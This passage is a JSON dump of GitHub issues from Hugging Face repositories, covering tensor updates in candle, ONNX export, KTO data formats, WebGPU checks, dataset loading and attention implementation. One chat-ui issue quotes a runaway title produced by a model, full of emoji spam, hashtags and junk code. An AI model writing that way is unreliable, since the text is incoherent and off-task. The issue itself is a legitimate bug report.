"question" ], "created_at": "2024-03-26T14:21:25Z", "updated_at": "2024-04-11T09:25:09Z", "user": "shuokay" }, { "repo": "huggingface/hub-docs", "number": 1257, "title": "Add section about deprecation of script-based datasets?", "body": "Asked here: https://github.com/huggingface/datasets-server/issues/2385#issuecomment-2017984722\r\n\r\n> Perhaps a little bit of suggestion from me is to include a disclaimer in the docs so that others are aware that developing a custom script is not supported.\r\n\r\nIt would also help answer the discussions + we could link in the error message directly.\r\n\r\n---\r\n\r\nOn the other hand, maybe we just want to deprecate it sooner than later, and not spend too much time on this.", "url": "https://github.com/huggingface/hub-docs/issues/1257", "state": "open", "labels": [ "question" ], "created_at": "2024-03-26T13:20:27Z", "updated_at": "2024-03-26T17:49:50Z", "user": "severo" }, { "repo": "huggingface/candle", "number": 1941, "title": "[help] how to update a portion of a long tensor", "body": "I'm aware of the closed issue(#1163 ) and understand that Var is mutable and Tensor is immutable by design. But I find it hard to impl some logic if it's impossible to update a portion of a Tensor.\r\n\r\nFor example, how can I generate a pairwise combination from two 2d tensors:\r\n```rust\r\n let a = Tensor::new(&[[1.0], [2.0]], &device)?;\r\n let b = Tensor::new(&[[3.0], [4.0]], &device)?;\r\n\r\n // how to generate a tensor that is the pair combination of the two?\r\n // [[1, 3], [1, 4], [2, 3], [2, 4]]\r\n\r\n let c = Tensor::zeros(&[2, 2, 1], DType::F32, &device)?;\r\n for i in 0..a.dim(0)? {\r\n for j in 0..b.dim(0)? {\r\n // won't work!\r\n // here we cannot set the content of the tensor via `set`\r\n c.i((i, j)).set(Tensor::cat(&[&a, &b], 0)?);\r\n }\r\n }\r\n```\r\n", "url": "https://github.com/huggingface/candle/issues/1941", "state": "closed", "labels": [], "created_at": "2024-03-26T11:47:56Z", "updated_at": "2024-04-07T15:42:45Z", "user": "michael8090" }, { "repo": "huggingface/optimum", "number": 1776, "title": "How to convert a model(tf_model.h5) with tokenizer folder to the onnx format", "body": "### Feature request\r\n\r\nI have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. The model is stored inside the folder in a **.h5** format - **tf_model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\n\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps \r\n\r\n### Motivation\r\n\r\nHi, I have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. The model is stored in the **.h5** format - **model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps \r\n\r\n### Your contribution\r\n\r\nI have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. The model is stored in the **.h5** format - **tf_model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps ", "url": "https://github.com/huggingface/optimum/issues/1776", "state": "open", "labels": [ "onnx" ], "created_at": "2024-03-26T10:48:02Z", "updated_at": "2024-10-14T13:35:13Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/alignment-handbook", "number": 142, "title": "Efficient dialog data format for KTO training", "body": "I have dialogs in the shareGPT format (see below) and for each `gpt` turn a label (thumbs up or thumbs down). But for KTO training, I have only seen datasets with the columns `prompt`, `completion` and `label` (see e.g. https://huggingface.co/datasets/trl-lib/kto-mix-14k).\r\n\r\nDo I need to unwind my shareGPT dialogs (see below) for KTO training, or is there some more efficient format I can use? \r\n\r\nHow should the dialog history be encoded in the `prompt` column (see below)?\r\n\r\nshareGPT-Format:\r\n```\r\n{\"conversations\":[\r\n {\"from\":\"system\",\"value\":\"You are a friendly assistant for ....\\n\"},\r\n {\"from\":\"human\",\"value\":\"Hello, I am Sam and ...\"},\r\n {\"from\":\"gpt\",\"value\":\"Welcome Sam, so you ....\"},\r\n {\"from\":\"human\",\"value\":\"Yes, but ....\"},\r\n {\"from\":\"gpt\",\"value\":\"Then ...\"}\r\n]}\r\n```\r\n\r\nTransformed to KTO, with `prompt` column as close as possible to https://huggingface.co/datasets/trl-lib/kto-mix-14k:\r\n```\r\nprompt, completion, label\r\n[ { \"content\": \"You are a friendly assistant for ....\\n\", \"role\": \"system\" }, { \"content\": \"Hello, I am Sam and ...\", \"role\": \"human\" }], {\"role\":\"gpt\",\"content\":\"Welcome Sam, so you ....\"}, true\r\n[ { \"content\": \"You are a friendly assistant for ....\\n\", \"role\": \"system\" }, { \"content\": \"Hello, I am Sam and ...\", \"role\": \"human\" }, {\"role\":\"gpt\",\"content\":\"Welcome Sam, so you ....\"}, {\"role\":\"human\",\"content\":\"Yes, but ....\"}], {\"role\":\"gpt\",\"content\":\"Then ...\"}, false\r\n``", "url": "https://github.com/huggingface/alignment-handbook/issues/142", "state": "open", "labels": [], "created_at": "2024-03-26T10:29:38Z", "updated_at": "2024-03-26T10:30:08Z", "comments": 0, "user": "DavidFarago" }, { "repo": "huggingface/transformers.js", "number": 664, "title": "How to confirm if webgpu actually working in the backend with inferencing", "body": "### Question\r\n\r\nHi Team,\r\nThanks for the awsome library. \r\nRecently I am experimenting to run background remove model in the client side using webgpu. I came across this solution https://huggingface.co/spaces/Xenova/remove-background-webgpu.\r\n\r\nTried to replicate the same in my local using your V3 branch.\r\n\r\nThe way I have used it is as below. \r\n```\r\nconst model = await AutoModel.from_pretrained('briaai/RMBG-1.4', {\r\n // Do not require config.json to be present in the repository\r\n config: { model_type: 'custom' },\r\n device: 'webgpu',\r\n dtype: 'fp32'\r\n })\r\n```\r\nI can see significant improvement while enabling `device: 'webgpu',` instead of wasm.\r\n\r\nQuestion 1:\r\nHow can I confirm if the webgpu is being used in the backend while inferencing as I can see in both of the case (with webgpu and without webgpu) the `ort-wasm-simd.jsep.wasm` file is getting loaded. why we are not loading `ort.webgpu.min`?\r\nSS\r\n![image](https://github.com/xenova/transformers.js/assets/55099778/836b092c-d3d7-4e81-99c5-7603a5affabd)\r\n\r\n\r\nQuestion 2: \r\nIt would be helpfull if you can share the repo for this `https://huggingface.co/spaces/Xenova/remove-background-webgpu ` as the code in huggingface is bundled.\r\n\r\nThanks in advance!!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/664", "state": "open", "labels": [ "question" ], "created_at": "2024-03-26T08:17:05Z", "updated_at": "2024-07-24T06:13:50Z", "user": "abiswas529" }, { "repo": "huggingface/dataset-viewer", "number": 2630, "title": "Take spawning.io opted out URLs into account in responses?", "body": "In particular, for images (assets / cached-assets).\r\n\r\nRaised internally: https://huggingface.slack.com/archives/C040J3VPJUR/p1702578556307069?thread_ts=1702577137.311409&cid=C040J3VPJUR", "url": "https://github.com/huggingface/dataset-viewer/issues/2630", "state": "open", "labels": [ "question", "P2" ], "created_at": "2024-03-25T11:49:49Z", "updated_at": "2024-03-25T11:49:58Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6756, "title": "Support SQLite files?", "body": "### Feature request\n\nSupport loading a dataset from a SQLite file\r\n\r\nhttps://huggingface.co/datasets/severo/test_iris_sqlite/tree/main\n\n### Motivation\n\nSQLite is a popular file format.\n\n### Your contribution\n\nSee discussion on slack: https://huggingface.slack.com/archives/C04L6P8KNQ5/p1702481859117909 (internal)\r\n\r\nIn particular: a SQLite file can contain multiple tables, which might be matched to multiple configs. Maybe the detail of splits and configs should be defined in the README YAML, or use the same format as for ZIP files: `Iris.sqlite::Iris`. \r\n\r\nSee dataset here: https://huggingface.co/datasets/severo/test_iris_sqlite\r\n\r\nNote: should we also support DuckDB files?", "url": "https://github.com/huggingface/datasets/issues/6756", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-03-25T11:48:05Z", "updated_at": "2024-03-26T16:09:32Z", "comments": 3, "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2629, "title": "Detect when a new commit only changes the dataset card?", "body": "Ideally, when we change the contents of the dataset card (not the YAML part), the responses computed by the datasets server should not be recomputed, because they will lead to the same results.\r\n\r\nasked here (private slack channel): https://huggingface.slack.com/archives/C04N96UGUFM/p1701862863691809\r\n\r\n> Sometimes I don't modify the dataset cards of datasets that have too many configs because I don't want to break the viewer for too long. I think we can detect when the change is only about the content dataset card and the dataset itself didn't change ?\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2629", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2024-03-25T10:57:36Z", "updated_at": "2024-06-19T16:02:33Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2627, "title": "Replace our custom \"stale bot\" action with the GitHub's one?", "body": "See `actions/stale@v5`\r\n\r\n```yaml\r\nname: Mark inactive issues as stale\r\non:\r\n schedule:\r\n - cron: \"30 1 * * *\"\r\n\r\njobs:\r\n close-issues:\r\n runs-on: ubuntu-latest\r\n permissions:\r\n issues: write\r\n pull-requests: write\r\n steps:\r\n - uses: actions/stale@v5\r\n with:\r\n days-before-issue-stale: 30\r\n days-before-issue-close: -1\r\n stale-issue-label: \"stale\"\r\n stale-issue-message: \"This issue is stale because it has been open for 30 days with no activity.\"\r\n close-issue-message: \"This issue was closed because it has been inactive for X days since being marked as stale.\"\r\n days-before-pr-stale: -1\r\n days-before-pr-close: -1\r\n repo-token: ${{ secrets.GITHUB_TOKEN }}\r\n```\r\n\r\nfrom https://huggingface.slack.com/archives/C493XH5FX/p1701942940388579?thread_ts=1701932787.319359&cid=C493XH5FX", "url": "https://github.com/huggingface/dataset-viewer/issues/2627", "state": "open", "labels": [ "question", "ci", "P2" ], "created_at": "2024-03-25T10:48:47Z", "updated_at": "2024-03-25T10:49:02Z", "user": "severo" }, { "repo": "huggingface/candle-paged-attention", "number": 1, "title": "How to use candle-paged-attention in candle models?", "body": "Could you provide an example of candle-paged-attention for actual usage in candle models (candle-examples)? Is this crate ready to be used in candle? i.e., tested in end2end model inference? I'm a little bit confused about the construction of block_tables and context_lens. ", "url": "https://github.com/huggingface/candle-paged-attention/issues/1", "state": "open", "labels": [], "created_at": "2024-03-25T09:09:24Z", "updated_at": "2024-03-25T12:07:13Z", "user": "guoqingbao" }, { "repo": "huggingface/optimum", "number": 1769, "title": "Accuracy change with BetterTransformer", "body": "When transforming the model into BetterTransformer model I'm seeing accuracy drop on the models. \r\nThe output scores changes considerably (upto 1-2 decimal points of precision). \r\n**Is accuracy change expected when switching to BetterTransformer ?** I'm not performing any ORT compilation or quantization on the model. \r\nFrom what I know FlashAttention is not supposed to change any accuracy since it is an exact attention score algorithm. Hence I'm not sure what is causing this change in score. \r\n\r\nSteps to reproduce\r\n```\r\nfrom transformers import AutoModelForSequenceClassification , AutoTokenizer\r\nfrom optimum.bettertransformer import BetterTransformer\r\n\r\ntokenizer=AutoTokenizer.from_pretrained(\"BAAI/bge-reranker-large\")\r\n\r\noriginal_model = AutoModelForSequenceClassification.from_pretrained(\"BAAI/bge-reranker-large\").to('cuda:0')\r\ntransformed_model = BetterTransformer.transform(original_model, keep_original_model=True).to('cuda:0')\r\n\r\nsentences_batch=[['do you like fox cookies', 'fox big brown fox']] \r\ninputs = tokenizer(sentences_batch,padding=True,truncation=True,return_tensors=\"pt\",max_length=512,).to('cuda:0')\r\n\r\nbetter_transformer_scores = transformed_model(**inputs, return_dict=True).logits.view(-1).float()\r\nprint(f\"BetterTransfomer output: {better_transformer_scores.detach().cpu().numpy().tolist()}\")\r\n\r\nvanilla_model_scores = original_model(**inputs, return_dict=True).logits.view(-1).float()\r\nprint(f\"Vanilla model output :{vanilla_model_scores.detach().cpu().numpy().tolist()}\")\r\n```\r\nOutput\r\n```\r\nBetterTransfomer output: [-7.378745079040527]\r\nVanilla model output :[-7.3596720695495605]\r\n```\r\n##### System state:\r\n* Package version:\r\n * transformers == 4.39.1\r\n * optimum == 1.17.1\r\n * torch == 2.2.1\r\n* Instance Type : AWS p3.2xlarge ( GPU V100) . (Tied it on A100 as well )\r\n* CUDA Version: 12.2\r\n* GPU Driver Version: 535.104.12", "url": "https://github.com/huggingface/optimum/issues/1769", "state": "closed", "labels": [ "bettertransformer", "Stale" ], "created_at": "2024-03-24T01:28:15Z", "updated_at": "2025-01-15T02:01:10Z", "comments": 7, "user": "kapilsingh93" }, { "repo": "huggingface/optimum-quanto", "number": 129, "title": "Performance of quanto quants vs bnb, AWQ, GPTQ, GGML ?", "body": "I was wondering if there were any comparisons done looking at the speed and ppl of `quanto` quantizations with respect to the other quantization techniques out there. ", "url": "https://github.com/huggingface/optimum-quanto/issues/129", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-23T11:37:33Z", "updated_at": "2024-04-11T09:22:47Z", "user": "nnethercott" }, { "repo": "huggingface/transformers", "number": 29826, "title": "How to convert pretrained hugging face model to .pt for deploy?", "body": "I'm attempting to convert this [model](https://huggingface.co/UrukHan/wav2vec2-russian) in .pt format. It's working fine for me so i dont want to fine-tune it. How can i export it to .pt and run interface for example in flask?\r\n\r\nI tried using this to convert to .pt:\r\n\r\n```\r\nfrom transformers import AutoConfig, AutoProcessor, AutoModelForCTC, AutoTokenizer, Wav2Vec2Processor\r\nimport librosa\r\nimport torch\r\n\r\n\r\n\r\n# Define the model name\r\nmodel_name = \"UrukHan/wav2vec2-russian\"\r\n\r\n# Load the model and tokenizer\r\nconfig = AutoConfig.from_pretrained(model_name)\r\nmodel = AutoModelForCTC.from_pretrained(model_name, config=config)\r\nprocessor = Wav2Vec2Processor.from_pretrained(model_name)\r\ntokenizer = AutoTokenizer.from_pretrained(model_name)\r\n\r\n# Save the model as a .pt file\r\ntorch.save(model.state_dict(), \"model.pt\")\r\n\r\n# Save the tokenizer as well if needed\r\ntokenizer.save_pretrained(\"model-tokenizer\")\r\n```\r\n\r\nbut unfortunately its not running the interface and not loading model from path :\r\n\r\n```\r\nmodel = AutoModelForCTC.from_pretrained(\"model.pt\")\r\nprocessor = AutoProcessor.from_pretrained(\"model.pt\")\r\n\r\n\r\n# Perform inference with the model\r\nFILE = 'here is wav.wav'\r\naudio, _ = librosa.load(FILE, sr = 16000)\r\naudio = list(audio)\r\ndef map_to_result(batch):\r\n with torch.no_grad():\r\n input_values = torch.tensor(batch, device=\"cpu\").unsqueeze(0) #, device=\"cuda\"\r\n logits = model(input_values).logits\r\n pred_ids = torch.argmax(logits, dim=-1)\r\n batch = processor.batch_decode(pred_ids)[0]\r\n return batch\r\nmap_to_result(audio)\r\nprint(map_to_result(audio))\r\n\r\n\r\nmodel.eval()\r\n```\r\n\r\nAnd encountered an error: \r\n`model.pt is not a local folder and is not a valid model identifier listed on 'https://huggingface.co/models'`\r\n\r\nWhat am i doing wrong?\r\nIf you can provide guideline on how to convert model to .pt and run it it will be appreciated!Thanks in advance!", "url": "https://github.com/huggingface/transformers/issues/29826", "state": "closed", "labels": [], "created_at": "2024-03-23T10:09:16Z", "updated_at": "2025-10-13T23:08:57Z", "user": "vonexel" }, { "repo": "huggingface/datasets", "number": 6750, "title": "`load_dataset` requires a network connection for local download?", "body": "### Describe the bug\n\nHi all - I see that in the past a network dependency has been mistakenly introduced into `load_dataset` even for local loads. Is it possible this has happened again?\r\n\n\n### Steps to reproduce the bug\n\n```\r\n>>> import datasets\r\n>>> datasets.load_dataset(\"hh-rlhf\")\r\nRepo card metadata block was not found. Setting CardData to empty.\r\n*hangs bc i'm firewalled*\r\n````\r\nstack trace from ctrl-c:\r\n```\r\n^CTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/load.py\", line 2582, in load_dataset\r\n builder_instance.download_and_prepare(\r\n output_path = get_from_cache( [0/122]\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 532, in get_from_cache\r\n response = http_head(\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 419, in http_head\r\n response = _request_with_retry(\r\n File \"/home/jobuser/.local/lib/python3.10/site-packages/datasets/utils/file_utils.py\", line 304, in _request_with_retry\r\n response = requests.request(method=method.upper(), url=url, timeout=timeout, **params)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/api.py\", line 59, in request\r\n return session.request(method=method, url=url, **kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/sessions.py\", line 587, in request\r\n resp = self.send(prep, **send_kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/sessions.py\", line 701, in send\r\n r = adapter.send(request, **kwargs)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/requests/adapters.py\", line 487, in send\r\n resp = conn.urlopen(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 703, in urlopen\r\n httplib_response = self._make_request(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 386, in _make_request\r\n self._validate_conn(conn)\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connectionpool.py\", line 1042, in _validate_conn\r\n conn.connect()\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connection.py\", line 363, in connect\r\n self.sock = conn = self._new_conn()\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/connection.py\", line 174, in _new_conn\r\n conn = connection.create_connection(\r\n File \"/home/jobuser/build/lipy-flytekit-image/environments/satellites/python/lib/python3.10/site-packages/urllib3/util/connection.py\", line 85, in create_connection\r\n sock.connect(sa)\r\nKeyboardInterrupt\r\n```\n\n### Expected behavior\n\nloads the dataset\n\n### Environment info\n\n```\r\n> pip show datasets\r\nName: datasets\r\nVersion: 2.18.0\r\n```\r\n\r\nPython 3.10.2", "url": "https://github.com/huggingface/datasets/issues/6750", "state": "closed", "labels": [], "created_at": "2024-03-23T01:06:32Z", "updated_at": "2024-04-15T15:38:52Z", "comments": 3, "user": "MiroFurtado" }, { "repo": "huggingface/dataset-viewer", "number": 2626, "title": "upgrade to pyarrow 15?", "body": "we use pyarrow 14", "url": "https://github.com/huggingface/dataset-viewer/issues/2626", "state": "closed", "labels": [ "question", "dependencies", "P2" ], "created_at": "2024-03-22T18:22:04Z", "updated_at": "2024-04-30T16:19:19Z", "user": "severo" }, { "repo": "huggingface/optimum-nvidia", "number": 102, "title": "Instructions on how to set TP/PP", "body": "https://github.com/huggingface/optimum-nvidia/blob/main/examples/text-generation.py is currently empty in that regard", "url": "https://github.com/huggingface/optimum-nvidia/issues/102", "state": "open", "labels": [], "created_at": "2024-03-22T03:48:30Z", "updated_at": "2024-03-22T03:48:30Z", "user": "fxmarty" }, { "repo": "huggingface/diffusers", "number": 7429, "title": "How to use k_diffusion with Controlnet (SDXL)?", "body": "Dear developer,\r\n\r\n\r\nI try to modify the code of [k_diffusion](https://github.com/huggingface/diffusers/blob/9613576191d8613fc550a1ec286adc4f1fc208ec/src/diffusers/pipelines/stable_diffusion_k_diffusion/pipeline_stable_diffusion_xl_k_diffusion.py#L837) to be compatible with controlnet.\r\n\r\nBut I got incorrect results, that is, controlnet did not work.\r\nThe code after I modified it is as follows:\r\n\r\n``` \r\ndef model_fn(x, t):\r\n latent_model_input = torch.cat([x] * 2)\r\n t = torch.cat([t] * 2)\r\n\r\n down_block_res_samples, mid_block_res_sample = self.controlnet(\r\n latent_model_input,\r\n t,\r\n encoder_hidden_states=prompt_image_emb,\r\n controlnet_cond=image,\r\n conditioning_scale=controlnet_conditioning_scale,\r\n guess_mode=guess_mode,\r\n added_cond_kwargs=added_cond_kwargs,\r\n return_dict=False,\r\n )\r\n \r\n noise_pred = self.k_diffusion_model(\r\n latent_model_input,\r\n t,\r\n cond=encoder_hidden_states,\r\n timestep_cond=timestep_cond,\r\n cross_attention_kwargs=self.cross_attention_kwargs,\r\n down_block_additional_residuals=down_block_res_samples,\r\n mid_block_additional_residual=mid_block_res_sample,\r\n added_cond_kwargs=added_cond_kwargs,\r\n )\r\n\r\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\r\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\r\n return noise_pred\r\n```\r\n \r\nSo, how should I solve this problem?\r\n\r\n\r\nThe source code of k_diffusion:\r\n```\r\ndef model_fn(x, t):\r\n latent_model_input = torch.cat([x] * 2)\r\n t = torch.cat([t] * 2)\r\n\r\n noise_pred = self.k_diffusion_model(\r\n latent_model_input,\r\n t,\r\n cond=prompt_embeds,\r\n timestep_cond=timestep_cond,\r\n added_cond_kwargs=added_cond_kwargs,\r\n )\r\n\r\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\r\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\r\n return noise_pred\r\n```", "url": "https://github.com/huggingface/diffusers/issues/7429", "state": "closed", "labels": [], "created_at": "2024-03-22T03:33:38Z", "updated_at": "2024-04-18T03:25:55Z", "user": "YoucanBaby" }, { "repo": "huggingface/transformers", "number": 29777, "title": "`MistralAttention`: where is the sliding window", "body": "Hi,\r\n\r\nI'm trying to understand the implementation of Mistral's attention in `MistralAttention`.\r\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/models/mistral/modeling_mistral.py#L195\r\nIt is my understanding that it should always be using local window attention. In `MistralFlashAttention2` this is very obvious, with `config.sliding_window` being used.\r\n\r\nHowever, I'm not sure where the sliding window is used in the base `MistralAttention` without flash attention:\r\n\r\n```python\r\nclass MistralAttention(nn.Module):\r\n \"\"\"\r\n Multi-headed attention from 'Attention Is All You Need' paper. Modified to use sliding window attention: Longformer\r\n and \"Generating Long Sequences with Sparse Transformers\".\r\n \"\"\"\r\n```\r\nbut the forward pass simply reads\r\n```python\r\nattn_weights = torch.matmul(query_states, key_states.transpose(2, 3)) / math.sqrt(self.head_dim)\r\n```\r\nwhich I understand as full self attention.\r\n\r\nIs the sliding window only used when running with Flash Attention, or am I missing something?\r\nThanks!\r\n", "url": "https://github.com/huggingface/transformers/issues/29777", "state": "closed", "labels": [], "created_at": "2024-03-21T12:27:56Z", "updated_at": "2025-02-06T13:49:46Z", "user": "fteufel" }, { "repo": "huggingface/data-is-better-together", "number": 18, "title": "Adding a template and information on how to set up a dashboard for any language", "body": "", "url": "https://github.com/huggingface/data-is-better-together/issues/18", "state": "closed", "labels": [], "created_at": "2024-03-21T09:19:36Z", "updated_at": "2024-03-21T18:29:34Z", "user": "ignacioct" }, { "repo": "huggingface/sentence-transformers", "number": 2550, "title": "How to estimate memory usage?", "body": "I would like to use `sentence-transformers` in a low-end machine (CPU-only) to load pre-trained models, such as `paraphrase-multilingual-MiniLM-L12-v2`, and compute a sentence's embedding.\r\n\r\nHow to estimate memory usage? Is there any guideline to describe the minimum system requirements for loading pre-trained models?", "url": "https://github.com/huggingface/sentence-transformers/issues/2550", "state": "open", "labels": [], "created_at": "2024-03-20T15:46:56Z", "updated_at": "2024-04-02T15:27:05Z", "user": "ChenZhongPu" }, { "repo": "huggingface/optimum-quanto", "number": 125, "title": "Is there any plan to add the function to export ONNX for quantized models or to inference on TVM compiler?", "body": "", "url": "https://github.com/huggingface/optimum-quanto/issues/125", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-20T15:38:44Z", "updated_at": "2024-04-11T09:23:55Z", "user": "ntkhoa95" }, { "repo": "huggingface/chat-ui", "number": 947, "title": "The prompt for title generation is not optimal", "body": "Hello,\r\nI've noticed that the prompt for title generation is not optimal. For example on my simple message `Hello`... The title I got was `\ud83d\udcac Hello! How can I help you today? Let me know if you have any questions or topics you'd like me to explain. I'll do my best to provide accurate and helpful information. Have a great day! \ud83d\ude0a #AI #HelpfulBot #Assistant #InformationSearchEngine #QuestionAnswerBot #Chatbot#ArtificialIntelligenceExplainedInOneSentence: Artificial Intelligence (AI) refers to computer systems designed to perform tasks that normally require human intelligence, such as visual perception, speech recognition, decision-making, and language translation. These systems use algorithms and data analysis techniques based on patterns in data to learn from experience and improve their performance over time. They can be programmed or trained using large datasets and machine learning algorithms, enabling them to recognize patterns, make decisions based on data inputs, and even learn new skills autonomously. AI applications range from simple rule-based systems like Siri or Alexa voice assistants all the way up through advanced deep learning models capable of complex problem solving like AlphaGo or Tesla Autopilot self-driving cars. The potential uses for AI are vast across industries including healthcare diagnostics, financial forecasting, customer service chatbots, image recognition software for security cameras or social media platforms - really anywhere where large amounts of data need processing at scale with high accuracy! If you have any specific questions about AI concepts or applications feel free to ask anytime! \ud83d\ude0a\ud83d\udc4d\ud83c\udffc#AIExplainedSimply #ArtificialIntelligenceForBeginners #WhatIsArtificialIntelligenceInOneSentence#ShortAnswerToWhatIsYourFavoriteMovie: I don't have personal experiences or preferences as I am an artificial intelligence language model designed for generating text responses based on given prompts; however I can suggest some popular movies across various genres that people often enjoy watching such as \"The Shawshank Redemption,\" \"The Godfather,\" \"Pulp Fiction,\" \"Forrest Gump,\" \"Star Wars\" series etc depending upon individual tastes & preferences which may vary greatly among different individuals due their unique backgrounds & cultural influences etc so it would be difficult for me give definitive answer without knowing more about specific person asking question :) Hope this helps clarify things though!! Let me know if there's anything else related (or unrelated!) that comes up :-) Have a fantastic day!!!!! \ud83d\ude0a\ud83d\udc96\ud83d\ude4f\ud83c\udffc\ud83d\udc95\ud83d\udc95\ud83d\udc95\ud83d\udc95\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\udc96\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude4c\ud83c\udffb\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83d\ude0d\ud83e\udd70\ud83e\udd70\ud83e\udd70\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\u2764\ufe0f\ud83c\udf0d\ud83c\udf0d\ud83c\udf0d\ud83c\udf0d\ud83d\ude80\ud83d\ude80\ud83d\ude80\ud83d\ude80!!!!!!!!!!!!!!!!!\u2600\u2600\u2600\u2600\u2600\u2600\u2600\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udd25\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaa\ud83c\udffd\ud83d\udcaaheiters\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83c\udf89\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34\ud83d\udd34![2023-03-24_15:57:49](data:image/*)%7C%7C[**Image Description:** A colorful sunset scene with orange clouds spreading across the sky above calm blue waters reflecting off rippling waves below.]%7C%7C[**Image Caption:** Beautiful sunset scene over tranquil waters.]%7C%7CThis image depicts a stunning sunset scene with vibrant orange clouds stretching out across the sky above calm blue waters reflecting off rippling waves below creating an idyllic atmosphere perfect for relaxation after a long day filled with challenges & triumphs alike . The warm colors evoke feelings of peacefulness while also hinting at new beginnings just around corner making it truly inspiring sight ! Enjoy this momentary pause before plunging back into bustling world once again . Remember : Life Is Beautiful ! Stay Positive , Stay Strong , Keep Smiling ! Peace Out !! <3 <3 <3 %F0%9F%8D%8B %F0%9F%8D%8B %F0@9F@8D@8B %EF@BB@BF @FFA6E4 @FFA6E4 @FFA6E4 @FFA6E4 @FFA6E4 @FFFFCC %FADEAD %FADEAD %FADEAD %FADEAD %. FADECED %. FADECED %. FADECED %. FADECED %. FACDCDB . FCFCFC FCFCFC FCFCFC FCFCFC . FEFEFE FEFEFE FEFEFE FEFEFE . C1C1C1 C1C1C1 C1C1C1 C5CAEA C5CAEA C5CAEA EAF2DC EAF2DC EAF2DC EAF2DC ... This is not actual text output but rather generated code representing an image file containing a beautiful sunset scene along with its description/caption in English language using Unicode characters commonly used within digital communication platforms such as emails , SMS messages , social media postsings etc allowing users share rich multimedia content seamlessly despite varying device capabilities / connectivity conditions ensuring consistent user experience regardless location/time constraints thus bridging geographical gaps fostering stronger interpersonal connections globally while also providing visually appealing contextual information enhancing overall engagement levels within various online communities thereby contributing towards positive societal impact by promoting emotional wellbeing through sharing joyful moments captured via technology advancements available today !`\r\nMy suggestion is, instead of using this bulk conversation in the summarize:\r\n```\r\n[\r\n { from: \"user\", content: \"Who is the president of Gabon?\" },\r\n { from: \"assistant\", content: \"\ud83c\uddec \ud83c\udde6 President of Gabon\" },\r\n ", "url": "https://github.com/huggingface/chat-ui/issues/947", "state": "open", "labels": [], "created_at": "2024-03-20T10:27:11Z", "updated_at": "2024-03-21T18:18:58Z", "comments": 5, "user": "ihubanov" }, { "repo": "huggingface/pytorch-image-models", "number": 2114, "title": "By using timm.create, how to download weights from url instead of HF?", "body": "I want to use url to load vit_base_patch8_224, and 